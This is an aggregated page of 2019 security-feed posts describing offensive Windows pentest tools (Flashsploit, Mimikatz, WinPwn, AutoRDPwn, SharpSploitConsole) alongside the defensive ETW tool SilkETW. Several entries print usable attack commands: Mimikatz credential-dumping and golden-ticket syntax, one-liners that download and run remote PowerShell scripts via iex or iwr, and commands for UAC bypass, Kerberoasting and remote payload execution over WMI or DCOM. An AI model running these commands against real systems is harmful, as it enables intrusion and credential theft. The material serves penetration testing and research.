Flashsploit – Exploitation Framework For ATtiny85 Based HID Attacks

Flashsploit is an Exploitation Framework for Attacks using ATtiny85 HID Devices such as Digispark USB Development Board, flashsploit generates Arduino IDE Compatible (.ino) Scripts based on User Input and then Starts a Listener in Metasploit-Framework if Required by the Script, in Summary : Automatic Script Generation with Automated msfconsole.FeaturesTODO : Add Linux and OSX ScriptsWindowsData ExfiltrationExtract all WiFi Passwords and Uploads an XML to SFTP Server:Extract Network Configuration Information of Target System and Uploads to SFTP Server:Extract Passwords and Other Critical Information using Mimikatz and Uploads to SFTP Server:Reverse ShellsGet Reverse Shell by Abusing Microsoft HTML Apps (mshta):Get Reverse Shell by Abusing Certification Authority Utility (certutil)Get Reverse Shell by Abusing Windows Script Host (csript)Get Reverse Shell by Abusing Windows Installer (msiexec)Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32)MiscellaneousChange Wallpaper of Target Machine:Make Windows Unresponsive using a .bat Script (100% CPU and RAM usage)Drop and Execute a File of your Choice, a ransomware maybe? ;)Disable Windows Defender Service on Target MachineTested onKali Linux 2019.2BlackArch LinuxDependenciesFlashsploit Depends upon 4 Packages which are Generally Pre-installed in Major Pentest OS :Metasploit-FrameworkPython 3SFTPPHPIf you think I should still make an Install Script, Open an issue.Usagegit clone https://github.com/thewhiteh4t/flashsploit.git cd flashsploitpython3 flashsploit.py Download Flashsploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/lPG04RLt5rk/flashsploit-exploitation-framework-for.html

UPDATE: MITRE CALDERA 2.0

PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in thisRead more about UPDATE: MITRE CALDERA 2.0
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/

SilkETW – Flexible C# Wrapper For ETW (Event Tracing for Windows)

SilkETW is a flexible C# wrapper for ETW, it is meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While SilkETW has obvious defensive (and offensive) applications it is primarily a research tool in it’s current state.For easy consumption, output data is serialized to JSON. The JSON data can either be analyzed locally using PowerShell or shipped off to 3rd party infrastructure such as Elasticsearch.Implementation DetailsLibrariesSilkETW is buit on .Net v4.5 and uses a number of 3rd party libraries, as shown below. Please see LICENSE-3RD-PARTY for further details.ModuleId Version LicenseUrl ——– ——- ———- McMaster.Extensions.CommandLineUtils 2.3.2 https://licenses.nuget.org/Apache-2.0 Microsoft.Diagnostics.Tracing.TraceEvent 2.0.36 https://github.com/Microsoft/perfview/blob/master/LICENSE.TXTNewtonsoft.Json 12.0.1 https://licenses.nuget.org/MIT System.ValueTuple 4.4.0 https://github.com/dotnet/corefx/blob/master/LICENSE.TXT YaraSharp 1.3.1 https://github.com/stellarbear/YaraSharp/blob/master/LICENSECommand Line OptionsCommand line usage is fairly straight forward and user input is validated in the execution prologue. See the image below for further details.JSON Output StructureThe JSON output, prior to serialization, is formatted according to the following C# struct.public struct EventRecordStruct{ public Guid ProviderGuid; public List YaraMatch; public string ProviderName; public string EventName; public TraceEventOpcode Opcode; public string OpcodeName; public DateTime TimeStamp; public int ThreadID; public int ProcessID; public string ProcessName; public int PointerSize; public int EventDataLength; public Hashtable XmlEventData;}Note that, depending on the provider and the event type, you will have variable data in the XmlEventData hash table. Sample JSON output can be seen below for “Microsoft-Windows-Kernel-Process" -> "ThreadStop/Stop".{ "ProviderGuid":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716", "YaraMatch":[ ], "ProviderName":"Microsoft-Windows-Kernel-Process", "EventName":"ThreadStop/Stop", "Opcode":2, "OpcodeName":"Stop", "TimeStamp":"2019-03-03T17:58:14.2862348+00:00", "ThreadID":11996, "ProcessID":8416, "ProcessName":"", "PointerSize":8, "EventDataLength":76, "XmlEventData":{ "FormattedMessage":"Thread 11,996 (in Process 8,416) stopped. ", "StartAddr":"0x7fffe299a110", "ThreadID":"11,996", "UserStackLimit":"0x3d632000", "StackLimit":"0xfffff38632d39000", "MSec":"560.5709", "TebBase":"0x91c000", "CycleTime":"4,266,270", "ProcessID":"8,416", "PID":"8416", "StackBase":"0xfffff38632d40000", "SubProcessTag":"0", "TID":"11996", "ProviderName":"Microsoft-Windows-Kern el-Process", "PName":"", "UserStackBase":"0x3d640000", "EventName":"ThreadStop/Stop", "Win32StartAddr":"0x7fffe299a110" }}UsageFilter data in PowerShellYou can import JSON output from SilkETW in PowerShell using the following simple function.function Get-SilkData { param($Path) $JSONObject = @() Get-Content $Path | ForEach-Object { $JSONObject += $_ | ConvertFrom-Json } $JSONObject}In the example below we will collect process event data from the Kernel provider and use image loads to identify Mimikatz execution. We can collect the required data with the following command.SilkETW.exe -t kernel -kk ImageLoad -ot file -p C:\Users\b33f\Desktop\mimikatz.jsonWith data in hand it is easy to sort, grep and filter for the properties we are interested in.YaraSilkETW includes Yara functionality to filter or tag event data. Again, this has obvious defensive capabilities but it can just as easily be used to augment your ETW research.In this example we will use the following Yara rule to detect Seatbelt execution in memory through Cobalt Strike’s execute-assembly.rule Seatbelt_GetTokenInformation{ strings: $s1 = "ManagedInteropMethodName=GetTokenInformation" ascii wide nocase $s2 = "TOKEN_INFORMATION_CLASS" ascii wide nocase $s3 = /bool\(native int,valuetype \w+\.\w+\/\w+,native int,int32,int32&/ $s4 = "locals (int32,int64,int64,int64,int64,int32& pinned,bool,int32)" ascii wide nocase condition: all of ($s*)}We can start collecting .Net ETW data with the following command. The "-yo" option here indicates that we should only write Yara matches to disk!SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -l verbose -y C:\Users\b33f\Desktop\yara -yo matches -ot file -p C:\Users\b33f\Desktop\yara.jsonWe can see at runtime that our Yara rule was hit.Note also that we are only capturing a subset of the "Microsoft-Windows-DotNETRuntime" events (0x2038), specifically: JitKeyword, InteropKeyword, LoaderKeyword and NGenKeyword.ChangelogFor details on version specific changes, please refer to the Changelog.Download SilkETW

Link: http://feedproxy.google.com/~r/PentestTools/~3/BJmvoNfqSg4/silketw-flexible-c-wrapper-for-etw.html

Mimikatz v2.2.0 – A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

mimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.But that’s not all! Crypto, Terminal Server, Events, … lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).If you don’t want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releasesQuick usagelogprivilege::debugsekurlsasekurlsa::logonpasswordssekurlsa::tickets /exportsekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmdkerberoskerberos::list /exportkerberos::ptt c:\chocolate.kirbikerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbicryptocrypto::capicrypto::cngcrypto::certificates /exportcrypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINEcrypto::keys /exportcrypto::keys /machine /exportvault & lsadumpvault::credvault::listtoken::elevatevault::credvault::listlsadump::samlsadump::secretslsadump::cachetoken::revertlsadump::dcsync /user:domain\krbtgt /domain:lab.localBuildmimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 – http://www.microsoft.com/download/details.aspx?id=44914)for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)Synchronize!GIT URL is : https://github.com/gentilkiwi/mimikatz.gitSVN URL is : https://github.com/gentilkiwi/mimikatz/trunkZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zipBuild the solutionAfter opening the solution, Build / Build Solution (you can change architecture)mimikatz is now built and ready to be used! (Win32 / x64)you can have error MSB3073 about _build_.cmd and mimidrv, it’s because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.ddk2003With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)For this optional platform, Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.Follow instructions:http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systemehttp://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheaderLicenceCC BY 4.0 licence – https://creativecommons.org/licenses/by/4.0/mimikatz needs coffee to be developed:ETH: 0x3a56af999b5e68f9e6e0a7dce1833efefad5b470BTC: 1C6bubazp9xq3BfYiHvsqP1sEhFYykUDo5PayPal: https://www.paypal.me/delpy/AuthorBenjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )DCSync function in lsadump module was co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )This is a personal development, please respect its philosophy and don’t use it for bad things!Download Mimikatz

Link: http://www.kitploit.com/2019/04/mimikatz-v220-post-exploitation-tool-to.html

WinPwn – Automation For Internal Windows Penetrationtest

In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. I only load them one after the other into RAM via IEX Downloadstring and partially automate the execution to save time.Yes it is not a C# and it may be flagged by antivirus solutions. Windows Defender for example blocks some of the known scripts/functions.Different local recon modules, domain recon modules, pivilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!Just Import the Modules with “Import-Module .\WinPwn_v0.7.ps1" or with iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1’)Functions available after Import: WinPwn -> Guides the user through all functions/Modules with simple questions. Inveigh -> Executes Inveigh in a new Console window (https://github.com/Kevin-Robertson/Inveigh), SMB-Relay attacks with Session management afterwards sessionGopher -> Executes Sessiongopher and Asking for parameters (https://github.com/Arvanaghi/SessionGopher) Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit) localreconmodules -> Executes Get-Computerdetails and Just another Windows Privilege escalation script + Winspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS) JAWS -> Just another Windows Privilege Escalation script gets executed domainreconmodules -> Different Powerview situal awareness functions get executed and the output stored on disk. In Addition a Userlist for DomainpasswordSpray gets stored on disk. An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon. (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray) Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump) lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne) latmov -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems. Domainpassword-Spray for new Credentials can also be used here. empirelauncher -> Launch powershell empire oneliner on remote Systems (https://github.com/EmpireProject/Empire) shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder from Powerview (Powersploit) groupsearch -> Get-DomainGPOUserLocalGroupMapping – find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit) Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking isadmin -> Checks for local admin access on the local system Sharphound -> Downloads Sharphound and collects Information for the Bloodhound DB adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record and run Inveigh for mass hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard) The "oBEJHzXyARrq.exe"-Executable is an obfuscated Version of jaredhaights PSAttack Tool for Applocker/PS-Restriction Bypass (https://github.com/jaredhaight/PSAttack).Todo:Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.Proxy Options via PAC-File are not correctly found in the moment.Legal disclaimer:Usage of WinPwn for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.Download WinPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/9lPHNu1cvU8/winpwn-automation-for-internal-windows.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 4.0 or higherChangesVersion 4.8• Compatibility with Powershell 4.0• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)• Automatic exclusion in Windows Defender (4 different methods)• Remote execution without password for PSexec, WMI and Invoke-Command• New available attack: DCOM Passwordless Execution• New available module: Remote Access / Metasploit Web Delivery• New module available: Remote VNC Server (designed for legacy environments)• Autocomplete the host, user and password fields by pressing Enter• It is now possible to run the tool without administrator privileges with the -noadmin parameter*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

RDP Servers, Mimikatz, & LibreOffice – Hack Naked News #206

    This week, RDP Servers Can Hack Client Devices, Roughly 500,000 Ubiquiti devices may be affected by a flaw already exploited in the wild, Crypto exchange in limbo after the founder dies with password, Home DNA kit company says its working with the FBI, Outlaw Shellbot infects Linux servers to mine for Monero, Apple’s […]
The post RDP Servers, Mimikatz, & LibreOffice – Hack Naked News #206 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/6ydFfgEPIFk/

UPDATE: Infection Monkey 1.6.1

PenTestIT RSS Feed
I’m sure you must have read my previous post title the List of Adversary Emulation Tools. In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have Infection Monkey 1.6.1. An important change about this version is that this is an AWS onlyRead more about UPDATE: Infection Monkey 1.6.1
The post UPDATE: Infection Monkey 1.6.1 appeared first on PenTestIT.

Link: http://pentestit.com/update-infection-monkey-1-6-1/

AutoRDPwn v4.5 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 5.0 or higherChangesVersion 4.5• New ninja style icon!• Automatic cleaning of Powershell history after execution• Now all dependencies are downloaded from the same repository• Many errors and bugs fixed• UAC & AMSI bypass in 64-bit systems• New module available: Remote Desktop Caching• New module available: Disable system logs (Invoke-Phant0m)• New module available: Sticky Keys Hacking• New available module: Remote Desktop History• New available attack: Session Hijacking (passwordless)WARNING! This attack is very intrusive and can only be used locally*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZHHxiH4qJi0/autordpwn-v45-shadow-attack-framework.html

SharpSploitConsole – Console Application Designed To Interact With SharpSploit

Console Application designed to interact with SharpSploit released by @cobbr_ioSharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community and combines it into one sweet DLL. It’s awesome so check it out!DescriptionSharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit. By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target sytem and run over a non-interactive shell (such as beacon).This concept can be applied to many C# binaries. For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn’t rely on the System.Management.Automation.dll on the target system.Contact at:Twitter: @anthemtotheego or @g0ldengunsecSetup – Quick and DirtyNote: For those of you who don’t want to go through the trouble of compiling your own I uploaded an x64 and x86 binary found in the CompiledBinaries folder. For those of you who do want to compile your own… I used Windows 10, Visual Studio 2017 – mileage may varyDownload SharpSploit tool from https://github.com/cobbr/SharpSploit.git Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for correct architecture) – Should see drop down with Any CPU > Click on it and open Configuration Manager > under platform change to desired architecture and select ok. Download SharpSploitConsole tool and open up SharpSploitConsole.sln Copy both SharpSploit.dll and System.Management.Automation.dll found in SharpSploit/bin/x64/Debug directory into SharpSploitConsole/bin/x64/Debug folder Next we will set up visual studio to embed our DLL’s into our exe so we can just have a single binary we can run on our target machine. We will do this by doing the following: In visual studio:a. Tools > NuGet Package Manager > Package Manager Consoleb. Inside console run: Install-Package Costura.Fodyc. Open up notepad and paste the following code below and save it with the name FodyWeavers.xml inside the SharpSploitConsole directory that holds your bin, obj, properties folders. <Weavers> <Costura /> </Weavers>Inside visual studio, right click References on the righthand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLL’s, select them and add them. Compile, drop binary on target computer and have fun. ExamplesNote: All commands are case insensitiveBy default all commands can be taken in as command line args, they will be executed and the program will exit (great for remote shells). This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords. Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell.Start interactive console mode:InteractMimikatz all the things (does not run DCSync) – requires admin or system:Mimi-AllRuns a specific Mimikatz command of your choice – requires admin or system:Mimi-Command privilege::debug sekurlsa::logonPasswordsRuns the Mimikatz command privilege::debug sekurlsa::logonPasswords – requires admin or system:logonPasswordsRuns the Mimikatz command to retrieve Domain Cached Credentials hashes from registry – requires admin or system:LsaCacheRuns the Mimikatz command to retrieve LSA Secrets stored in registry – requires admin or system:LsaSecretsRetrieve password hashes from the SAM database – requires admin or system:SamDumpRetrieve Wdigest credentials from registry – requires admin or system:WdigestRetrieve current user:whoamiUsernameImpersonate system user – requires admin rights:GetSystemImpersonate system user – Impersonate the token of a specified process, requires pid – command requires admin rights:Impersonate 2918Bypass UAC – requires binary | command | path to binary – requires admin rights:BypassUAC cmd.exe ipconfig C:\Windows\System32\BypassUAC cmd.exe "" C:\Windows\System32\Ends the impersonation of any token, reverts back to initial token associated with current process:RevertToSelfRetrieve current working directory:CurrentDirectoryRetrieve current directory listing:DirectoryListingChanges the current directory by appending a specified string to the current working directory:ChangeDirectory SomeFolderRetrieve hostname:HostnameRetrieve list of running processes:ProcessListCreates a minidump of the memory of a running process, requires PID | output location | output name – requires admin:ProcDump 2198 C:\Users\Username\Desktop memorydump.dmpRetrieve registry path value, requires full path argument:ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumberWrite to registry, requires full path argument and value argument:WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1Retrieve users of local group remotely, requires computername | groupname | username | password:NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!Retrieve local groups remotely, requires computername | username | password:NetLocalGroups computerName domain\username P@55w0rd!NetLocalGroups 192.168.1.20 .\username P@55w0rd!Retrieve current logged on users remotely, requires computername | username | password:NetLoggedOnUsers computerName domain\username P@55w0rd!NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!Retrieve user sessions remotely, requires computername | username | password:NetSessions computerName domain\username P@55w0rd!NetSessions 192.168.1.20 .\username P@55w0rd!Ping systems, requires computernames:Ping computer1 computer2 computer3 computer4Port scan systems, requires computername | ports:PortScan computer1 80 443 445 22 23Get Domain Users, Grabs specified (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:GetDomainUsersGet Domain Groups, Grabs specified (or all) group objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:GetDomainGroupsGetDomainGroups -target "Domain Admins"Get Domain Computers, Grabs specified (or all) computer objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:GetDomainComputersPerform Kerberoasting, Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -targetKerberoastKerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlServiceRun command remotely via WMI, requires computername | username | password | command – requires admin:WMI computer1 domain\username P@55w0rd! <entire powershell empire payload>WMI computer1 .\username P@55w0rd! powershell -noP -sta -w 1 -enc <Base64>Run command remotely via DCOM, requires computername | command | directory | params – requires admin:DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc <Base64>Run shell command:Shell ipconfig /allRun powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging:Powershell -noP -sta -w 1 -enc <Base64>Currently available options (more to come)Interact : Starts interactive console mode, if you are interacting remotely you may not want to use this optionMimi-All : Executes everything but DCSync, requires adminMimi-Command : Executes a chosen Mimikatz commandlogonPasswords : Runs privilege::debug sekurlsa::logonPasswordsLsaCache : Retrieve Domain Cached Credentials hashes from registryLsaSecrets : Retrieve LSA secrets stored in registrySamDump : Retrieve password hashes from the SAM databaseWdigest : Retrieve Wdigest credentials from registrywhoami : Retrieve current userGetSystem : Impersonate system user, requires admin rightsImpersonate : Impersonate the token of a specified process, requires pid – command requires admin rights.BypassUAC : Bypass UAC, requires binary | command | path to binary – requires admin rightsRevertToSelf : Ends the impersonation of any token, reverts back to initial token associated with current processCurrentDirectory : Retrieve current working directoryDirectoryListing : Retrieve current directory listingChangeDirectory : Changes the current directory by appending a specified string to the current working directoryHostname : Retrieve hostnameProcessList : Retrieve list of running processesProcDump : Creates a minidump of the memory of a running process, requires PID | output location | output name – requires adminUsername : Retrieve current usernameReadRegistry : Retrieve registry path value, requires full path argumentWriteRegistry : Write to registry, requires full path argument | valueNetLocalGroupMembers : Retrieve users of local group remotely, requires computername | groupname | username | passwordNetLocalGroups : Retrieve local groups remotely, requires computername | username | passwordNetLoggedOnUsers : Retrieve current logged on users remotely, requires computername | username | passwordNetSessions : Retrieve user sessions remotely, requires computername | username | passwordPing : Ping systems, requires computernames"PortScan : Port scan systems, requires computername | portsGetDomainUsers : Grabs specified (or all) user objects in the target domain, by default will use current user contextGetDomainGroups : Grabs specified (or all) group objects in the target domain, by default will use current user contextGetDomainComputers : Grabs specified (or all) computer objects in the target domain, by default will use current user contextKerberoast : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user contextWMI : Run command remotely via WMI, requires computername | username | password | command | requires adminDCOM : Run command remotely via DCOM, requires computername | command | directory | params – requires adminShell : Run a shell commandPowershell : Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module loggingDownload SharpSploitConsole

Link: http://feedproxy.google.com/~r/PentestTools/~3/kATTdJ2komM/sharpsploitconsole-console-application.html